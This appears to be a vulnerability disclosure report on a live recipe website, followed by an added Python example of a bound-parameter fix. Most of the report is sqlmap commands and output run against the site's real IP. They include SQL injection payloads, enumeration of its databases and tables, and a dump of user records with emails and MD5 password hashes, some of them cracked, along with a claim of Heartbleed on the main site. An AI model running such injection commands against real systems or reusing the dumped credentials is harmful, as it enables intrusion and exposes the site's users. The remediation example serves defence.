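2015-11-08: Actively contacting the vendor and waiting for the vendor to claim the report; details are not disclosed publicly
2015-12-23: The vendor has actively ignored the vulnerability; details are disclosed to the public
Mom will never again have to worry that I can't cook.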
http://www.xibao360.com/
D:\Python27\sqlmap>sqlmap.py -u "http://121.40.212.164/search/?q=1" --dbs --batch
---
Parameter: q (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: q=1%' AND 1962=1962 AND '%'='

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: q=1%' AND (SELECT 8058 FROM(SELECT COUNT(*),CONCAT(0x717a6a6a71,(SELECT (ELT(8058=8058,1))),0x716b627a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND '%'='

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: q=1%' AND (SELECT * FROM (SELECT(SLEEP(5)))bQEW) AND '%'='
---
available databases [11]:
[*] cdcol
[*] data
[*] data_caipu
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] webauth
[*] yinshi
[*] yinshi_temp
I'm most interested in data_caipu, so let's try it.
D:\Python27\sqlmap>sqlmap.py -u "http://121.40.212.164/search/?q=1" -D data_caipu --tables --batch
Database: data_caipu
[26 tables]
+---------------+
| ys_art        |
| ys_art_grade  |
| ys_ask        |
| ys_caipu      |
| ys_cat        |
| ys_category   |
| ys_comment    |
| ys_cookbook   |
| ys_follow     |
| ys_health     |
| ys_knowlage   |
| ys_link       |
| ys_look       |
| ys_love       |
| ys_message    |
| ys_nav2       |
| ys_nav_3      |
| ys_nav_7      |
| ys_nav_seo    |
| ys_page       |
| ys_shiliao    |
| ys_shoucang   |
| ys_slide      |
| ys_user       |
| ys_user_level |
| ys_web        |
+---------------+
Dump some data.
D:\Python27\sqlmap>sqlmap.py -u "http://121.40.212.164/search/?q=1" -D data_caipu -T ys_user --dump --stop 3 --batch
Database: data_caipu
Table: ys_user
[3 entries]
+-----+-----+------+----------+------+-----------------------+-------------------+------------+---------+---------+-------------------------------------------+----------+
| uid | hit | url | name | love | photo | email | date | level | chufang | password |qianming |
+-----+-----+------+----------+------+-----------------------+-------------------+------------+---------+---------+-------------------------------------------+----------+
| 1 | 568 | NULL | 饭桶 | 0 | Upload/nophotobig.jpg | [email protected]om | 1438056321 | 1 | 厨房 | a1aded0db590352c29f5109fc52331e2 | NULL |
| 2 | 485 | NULL | tianqi | 0 | Upload/nophotobig.jpg | [email protected] | 1439261954 | 1 | 厨房 | e10adc3949ba59abbe56e057f20f883e (123456)| NULL |
| 3 | 495 | NULL | dgcbeyqr | 0 | Upload/nophotobig.jpg | [email protected] | 1438056000 | 1 | 厨房 | d41d8cd98f00b204e9800998ecf8427e ()| NULL |
+-----+-----+------+----------+------+-----------------------+-------------------+------------+---------+---------+-------------------------------------------+----------+
Finally, I also found that the main site has the Heartbleed vulnerability.
As above.
null
Unable to contact the vendor, or the vendor actively refused.
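The payload shape in the sqlmap output (`q=1%' ... AND '%'='`) indicates that `q` is pasted into a `LIKE '%...%'` string. The following is an added example, not code from the report or the affected site, showing that query shape beside a bound-parameter fix. It assumes SQLite as a stand-in for MySQL; the `recipes` table, its rows, the function names and the false-condition probe are constructed for illustration.

```python
import sqlite3

def make_db():
    # Constructed sample data; table and column names are hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE recipes (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO recipes (title) VALUES (?)",
                   [("1 egg omelette",), ("tomato soup",), ("100% rye bread",)])
    return db

def search_concat(db, q):
    # Vulnerable shape (assumed from the payload): q becomes part of the SQL text.
    sql = "SELECT title FROM recipes WHERE title LIKE '%" + q + "%' ORDER BY id"
    return [row[0] for row in db.execute(sql)]

def escape_like(q, esc="\\"):
    # Neutralise LIKE metacharacters so user input only matches literally.
    return q.replace(esc, esc + esc).replace("%", esc + "%").replace("_", esc + "_")

def search_bound(db, q):
    # Hardened: q is sent as a bound parameter and never parsed as SQL.
    sql = "SELECT title FROM recipes WHERE title LIKE ? ESCAPE '\\' ORDER BY id"
    return [row[0] for row in db.execute(sql, ("%" + escape_like(q) + "%",))]

# Boolean-based payload from the report (URL-decoded) and a constructed
# false-condition twin; differing responses are what a scanner keys on.
TRUE_PROBE = "1%' AND 1962=1962 AND '%'='"
FALSE_PROBE = "1%' AND 1962=1963 AND '%'='"

if __name__ == "__main__":
    db = make_db()
    for name, fn in (("concat", search_concat), ("bound", search_bound)):
        print(name, "true :", fn(db, TRUE_PROBE))
        print(name, "false:", fn(db, FALSE_PROBE))
    print("bound, literal '100%':", search_bound(db, "100%"))
```

With the bound version both probes return the same empty result, so the response no longer depends on the injected condition. On MySQL the same fix is a prepared statement with a placeholder; the `ESCAPE` clause syntax there differs slightly because backslash is an escape character inside MySQL string literals.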